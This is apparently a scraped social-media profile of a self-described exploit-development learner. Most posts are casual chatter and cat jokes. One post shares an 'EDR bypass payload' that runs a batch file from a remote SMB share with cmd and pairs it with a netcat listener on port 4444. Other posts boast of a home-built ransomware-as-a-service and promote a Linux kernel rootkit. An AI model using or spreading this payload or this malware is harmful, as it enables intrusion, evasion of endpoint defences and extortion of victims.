assad12341

13 posts

assad12341

assad12341

@assadKEK

fullstack C/C++ developer. learning exploit dev | CVE archaeology - Responsible disclosure only ! No 0-days here. research purposes ONLY

Saint Petersburg, Russia Katılım Haziran 2025
1 Takip Edilen0 Takipçiler
assad12341
assad12341@assadKEK·
anyways, been working on my own raas will post on ghub when done ( educational purposes ) and NO i will not blame slow speeds on i/o NO its not a conti copypaste and yes its written fully offline, self implemented algs etc ( im not lockbit) 100mbs w only chacha:)
assad12341 tweet media
English
0
0
0
23
assad12341
assad12341@assadKEK·
been inactive for a while anyways bypass EDR payload https://&cmd/c\\\\192.168.2.15\\Public\\aa.bat nc -lvnp 4444 enjoy!:)
English
0
0
0
32
assad12341
assad12341@assadKEK·
fucking monday sudo wget cofee_and_cat.sh chmod +x cofee_and_cat.sh ./cofee_and_cat.sh
assad12341 tweet media
English
0
0
0
26
assad12341
assad12341@assadKEK·
chipihapachaparubirubidabadabamagicodumdumdum:3
Eesti
0
0
0
15
assad12341
assad12341@assadKEK·
prob one of my favorite rootkit out there check it out, nice little morning gift. BlackPill A Linux kernel rootkit in Rust using a custom made type-2 hypervisor, eBPF XDP and TC programs github.com/DualHorizon/bl…
English
0
0
1
43
assad12341
assad12341@assadKEK·
oof! CVE-2024-53141 linux Kernel Flaw Enables Privilege Escalation мяу!, я кот>.<
assad12341 tweet media
Română
0
0
0
23
assad12341
assad12341@assadKEK·
DOOM в дырке от пододеяльника уже не спортивно * Linux в Excel
assad12341 tweet media
Українська
0
0
0
20
assad12341
assad12341@assadKEK·
hewwo kitties ;3
English
0
0
0
16